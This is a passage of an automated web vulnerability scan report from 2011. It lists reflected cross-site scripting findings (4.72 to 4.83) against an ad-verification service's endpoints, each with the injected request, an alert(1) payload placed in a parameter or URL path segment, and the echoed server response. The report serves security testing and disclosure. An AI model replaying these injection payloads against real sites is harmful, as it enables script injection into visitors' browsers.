GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?&acf01"-alert(1)-"2215212b286=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FAD174036125319C01B9C5766443D98; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?&acf01"-alert(1)-"2215212b286=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnxif"
};

(function(){var N="3.11.1";var v=(adsafeVisParams.deb
...[SNIP]...

4.72. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a8ed"-alert(1)-"9ea1d2dfa2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?4a8ed"-alert(1)-"9ea1d2dfa2b HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=447DFF1973A285E7F493DBCC94B1C93F; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=
...[SNIP]...
.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?4a8ed"-alert(1)-"9ea1d2dfa2b",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnx8p"
};

(function(){var N="3.11.1";var v=(adsafeVisParams.debug
...[SNIP]...

4.73. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbf5"-alert(1)-"12e0cf7b4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com5dbf5"-alert(1)-"12e0cf7b4e4/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F75D51DC4B4224390CEB316035A9D89F; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:33 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com5dbf5"-alert(1)-"12e0cf7b4e4/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "300
...[SNIP]...

4.74. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad3ea"-alert(1)-"7e31539aea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449ad3ea"-alert(1)-"7e31539aea6/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E2E66ABFF09E577612E681211EC6511C; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:33 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449ad3ea"-alert(1)-"7e31539aea6/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   a
...[SNIP]...

4.75. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c73"-alert(1)-"311e6476895 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/900364c73"-alert(1)-"311e6476895/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DD246A7FD505C11EEE9444741AC8FB97; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:34 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/900364c73"-alert(1)-"311e6476895/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid :
...[SNIP]...

4.76. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c499e"-alert(1)-"980593a7dc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/cac499e"-alert(1)-"980593a7dc0?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4D86B6ABDD40B4BAD1D2FFE8C8A73D0F; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/cac499e"-alert(1)-"980593a7dc0?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "g
...[SNIP]...

4.77. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [aid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6391"-alert(1)-"3ae5a3e1f48 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02c6391"-alert(1)-"3ae5a3e1f48&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3AC63BF3BBDDE3C9EFF4C4CD0AE1B7CC; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:29 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
ex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02c6391"-alert(1)-"3ae5a3e1f48&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnv0d"
};

(fun
...[SNIP]...

4.78. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24df3"-alert(1)-"556a380bc89 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster24df3"-alert(1)-"556a380bc89&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7E6542086595D32D2BCFC7C7C5E6B4D; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:30 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
deals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster24df3"-alert(1)-"556a380bc89&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnvmi"
};

(function(){var N="3.11.1";var
...[SNIP]...

4.79. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d874e"-alert(1)-"8f76ac85700 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935d874e"-alert(1)-"8f76ac85700&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B5DDC06E495E10B8505F32832C209348; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:30 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935d874e"-alert(1)-"8f76ac85700&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnvce"
};

(function(){var N
...[SNIP]...

4.80. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c4"-alert(1)-"07d3b495901 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90f43c4"-alert(1)-"07d3b495901&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E375663616B9246AF1F71BE2B9C988C5; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:30 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
lynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90f43c4"-alert(1)-"07d3b495901&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnw97"
};

(function(){var N="3.11.1";var v=(adsafeVi
...[SNIP]...

4.81. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aaaf"-alert(1)-"261704261b0 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=101aaaf"-alert(1)-"261704261b0 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E476E6E84728F9F552CC72B161900110; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
publishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=101aaaf"-alert(1)-"261704261b0",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnwxz"
};

(function(){var N="3.11.1";var v=(adsafeVisParams.debug
...[SNIP]...

4.82. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd534"-alert(1)-"dfd8c583060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10&cd534"-alert(1)-"dfd8c583060=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2DE02032DF9BCDEFD06A9FDA12B4EB11; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
ublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10&cd534"-alert(1)-"dfd8c583060=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnx80"
};

(function(){var N="3.11.1";var v=(adsafeVisParams.deb
...[SNIP]...

4.83. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 953fd"-alert(1)-"fc853a13bb5 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

